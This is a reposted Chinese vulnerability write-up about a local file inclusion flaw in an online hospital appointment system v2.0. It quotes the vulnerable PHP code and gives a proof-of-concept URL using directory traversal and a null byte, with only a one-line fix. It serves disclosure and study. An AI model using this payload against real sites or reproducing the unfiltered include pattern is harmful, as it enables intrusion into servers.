网上在线挂号预约管理系统 v2.0 本地包含及修复-自学php网

网上在线挂号预约管理系统 v2.0 本地包含及修复

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] Team:t00ls Author: 风之传说看到各位大牛为了为了版主拼命挖洞，不知不觉带动了偶熄灭已久的基情。在网上查了下，貌似没有这个程序的漏洞信息，就发出来交流学习，反正偶也要洞木有...

Team:t00ls Author: 风之传说
看到各位大牛为了为了版主拼命挖洞，不知不觉带动了偶熄灭已久的基情。

在网上查了下，貌似没有这个程序的漏洞信息，就发出来交流学习，反正偶也要洞木有用。

在网上随便找了下，漏洞很简单，只为了学习与交流。大牛飘过。看如下代码:
Index.php
@extract($_GET,EXTR_PREFIX_ALL,"g"); //所有提交函数加前缀g,提交o就变成g_o
if(isset($_POST['submit']) || isset($g_submit)){
@check_post_request();
@extract($_POST,EXTR_PREFIX_ALL,"p");
} //如果post有数据先检查，然后赋值。

session_cache_limiter('private,must-revalidate');
if(!isset($_SESSION)){
session_start();
}
$db = new c_mysql;
$g_m = (isset($g_m) && in_array_key($g_m,$config['model'])) ? $g_m : 'login';
$g_o = isset($g_o) ? $g_o : ''; //木有过滤
….
….
…
$operate_file = 'model/'.$g_m."_".$g_o.".php";
if(file_exists($operate_file)) //如果存在就包含 www.2cto.com
include($operate_file);

create_html();
?>
由于搭建失败，我是直接看代码未测试。给出测试代码：
http://www.2cto.com /index.php?o=/../../1.php%00

修复：过滤该页面

虐神百度小偷v1.0 cookie欺骗及修复 - 网站安全 -

行业之星0.87 vote.php注入及修复 - 网站安全 - 自学

子栏目

网上在线挂号预约管理系统 v2.0 本地包含及修复

最新评论

添加评论

更多文章推荐

添加评论